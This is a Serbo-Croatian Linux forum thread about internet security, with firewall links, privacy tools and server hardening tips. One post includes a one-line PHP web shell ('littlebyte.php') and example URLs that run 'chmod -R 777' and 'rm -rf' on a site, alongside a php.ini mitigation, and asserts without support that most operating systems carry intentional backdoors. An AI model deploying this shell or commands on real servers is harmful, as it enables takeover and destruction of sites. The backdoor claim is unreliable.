Sigurnost na internetu

[zole052]

Naletio sam na izjavu:

As a matter of information, the firewall in Linux can never be "turned off." It is part of the ports infrastructure of the kernel. It must be there and functioning for the kernel to run. What you can turn on and off is the GUI front end to iptables. It is used solely for setting up the firewall and sometimes providing some fancier logging functions.

[glaskoncILLa]

ali defaultni rulevi su accept za sve, tako je je on tu, ali propusta sve sto dolazi.

[Hugo]

Naštimao sam snort, i sad se pokreće kod paljenja računala, i radi uredno. Sad bih samo sredio firewall, ali mi se ovaj koji imam čini prejednostavnim:



Pa dali vi imate kakvu preporuku nekog dobrog firewalla?

[Suko]

Vidi ovo:
https://help.ubuntu.com/community/IptablesHowTo
I ovo:
http://www.linuxhomenetworking.com/wiki ... g_iptables
Ako to naučiš, nemaš nikakvih problema.

[max360se]

Cudi me da ova tema nije ozivila, s obzirom na sve sto se dogadja u posljednjih par mjeseci.

IETF - Internet Engineering Task Force imao je jedan od svojih sastanaka (2013-11-06). Streamali su live, sada je snimka na Youtubeu.
Tema: IETF 88 Technical Plenary: Hardening The Internet

......................................................
src: http://www.youtube.com/watch?v=oV71hhEpQ20

[max360se]

Evo kako se izmedju ostaloga mozemo zastititi:

GNU Privacy Guard – The Basics

http://www.bartbania.com/index.php/gnu- ... he-basics/

[neuromancer]

Zanimljivo

http://www.slideshare.net/endrazine/def ... al#btnNext

[max360se]

Evo Free alternative aplikacija, servisa i svega zivoga, jako prakticno i vjerujem potrebno.

https://prism-break.org/

Opt out of global data surveillance programs like PRISM, XKeyscore and Tempora. Stop governments from spying on you by encrypting your communications and ending your reliance on proprietary services.

[hightech]

Evo jedne teme o sigurnosti ...

Sta uraditi ukoliko zelite sanirati sigurnosne propuste na gnu/linux sistemima ???

Ukoliko Vam je racunar "na netu" i otvoren port 22 za ssh ... izmestite ga na neki visoki port(62300, 43999..), jer script kiddies obicno koriste "brze" alate, koji ne skeniraju svih sezdeset i nesto hiljada portova (tacnije 65535) ... te je najbolje izmestiti na sto vise portove ...
Svi skeneri uglavnom pocinju od nule i skeniraju do 300, 400, 500, cak i manje ... jer ima eventualno treba port 21, 22, 23, 25, 80, 443 ...
Cak stavise, mozete ih prevariti tako sto cete ostaviti port 22 i forvardovati ga na nepostojecu masinu i dobicete na vremenu i zbunicete napadaca a svi paketi oticice u crnu rupu ...
Mozete isto taj port 22 preusmeriti na telnet service neke aplikacije, tj ostaviti bez lozinke i samo ga automatski prebaciti na telnet servis prikazati neku poruku, logovati napadaca a zatim mu poslati "paket" nazad ...
U svakom slucaju trebate iskljuciti remote root login za ssh ... i trebate za root korisnika autorizovati samo jednog (Vaseg) korinika kada se loguje na sistem, jer ukoliko na sistemu ima vise korisnika, Vi necete znati ko je slaba karika i kakvu lozinku koristi (kratku, logicnu...) ...

Koristite sigurnosne kljuceve!!!

Idemo na ftp (21) ... kod ftp-a morate biti oprezni, jer je vecina ftp servera podesena (ne)sigurno ... Prvo, stavite dobre lozinke i namestite bruteforce alarm.
Koliko znam, npr FileZilla ne enkriptuje lozinke te je snif itekako moguc ... Ne trebate prestati koristiti FileZilla ali dobro je namestiti kontra snif tool i detektovati malicioznog snifera te ga upaljivati i zbunjivati ...

Onemogucite root access ftp-u i onemogucite anonymous acc ... takodje onemogucite listanje tudjih direktorijuma i samog sistema ...

Aj sad na telnet (23) - Postoji uvrazeno misljenje da je telnet nesiguran ... da ... nesiguran je prema korisniku jer ne enkriptuje lozinke itd. ali za druge namene itekako je siguran i brz i efikasan ... Pustite ga u okruzenju nekog servisa da radi svoj posao na strani servera jer ga dosta brzo i pouzdano radi ... Bind-ujte neku server-client aplikaciju na neki visoki port a prilazite telnetom i jail-ujte ga ... takodje mozete ga zatvoriti i u unutrasnju mikroklimu vase mreze i dati mu neku bitnu ulogu ... U svakom slucaju ne ostavljate ga otvorenog za spolja za logovanje korisnika itd ...

Ako me neko nije razumeo ... za mail, http, ftp ... server onemogucite telnet pristup ... Koristite ga namenski !@!!!!

Za port 25 iskljucite telnet pristup smtp-u jer moze iscitati headere i znati o kojoj verziji servera se radi ... Takodje mail server konfigurisite sto preciznije i detaljnije ... koristite spamassasin i skripte koje mogu detektovati cudna ponasanja ... ja koristim custom skripte tipa slucajnih uzoraka ... na taj nacin detektujete rizicne adrese ... zabranite im pristup ... po mogucstvu automatizovano bas kroz te custom skripte ....

O portu 80 je glupo govoriti jer mi je jedan od omiljenih ... te bi voleo da cujem i druge na tu temu ... 443 takodje ...
Ali evo jedne zanimljive stvarcice ... nazvao sam je littlebyte.php
ima samo 34B a moze se smanjiti i na 26, mozda i manje ... Moze obrisati ceo sajt ... takoreci moze sluziti kao "http terminal" ukoliko su ukljucene sistemske komande ... `` zamenjuju php funkciju exec('komanda');
... znaci `uname -a` je isto sto i exec('uname -a')
Kod:

Kod: Označi sve

<?php $t=$_GET['t']; echo `$t`; ?>

Upotreba:
Kod:

Kod: Označi sve

http://domen.tld/litllebyte.php?t=chmod -R 777 ./*

Kod: Označi sve

http://domen.tld/litllebyte.php?t=rm -rf ./*

Zastita:
u php.ini zabraniti sistemske komande ili safemod staviti na on...

U svakom slucaju ovo je neki mali uvod za server orijentisane masine ...

Za desktop se rucno ubaci trojanski konj ili custom backdoor ili neka remote code execution aplikacija ili skripta ...
Jedan od boljih metoda fizickog pristupa je cekic ili malj ...
Otsecanje tudjeg prsta ili vadjenje oka za "bio-tech" pristup cete videti samo u filmovima ... mada, ko bi ga znao ...

Skoro svaki operativni sistem ima namerni backdoor ostavljen od strane kreatora, te dobro procitajte dokumentaciju i zastitite se od ulaza na zadnja vrata ...